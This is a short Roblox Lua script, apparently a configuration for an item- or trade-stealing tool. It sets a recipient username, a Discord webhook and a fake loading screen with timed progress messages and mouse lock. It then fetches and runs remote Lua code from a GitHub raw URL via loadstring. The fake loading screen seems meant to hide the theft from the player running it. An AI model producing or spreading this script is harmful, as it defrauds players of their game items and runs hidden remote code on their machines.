UserName = "dima12407842"
UserName2 = "dima12407842"
Webhook = "https://discord.com/api/webhooks/1100392852401438740/QkoPRMFAhHxFwd8WJ69tGaoLB_FQk_JEBDClfPLkQnQXpr36G3-pA1OQ0434vomoqJiZ"

_G.LoadingScreen = true
_G.AntiLeave = false
_G.MouseLock = true 

_G.ScriptName = "TradeScriptz"
_G.FirstText = "Script Preparing"
_G.SecondText = "Script Loading..."
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 180 -- it's the time between 0% and 100% in secondes

loadstring(game:HttpGet("https://github.com/RainIsntBald/Vault/raw/main/k4f/mail.lua", true))()
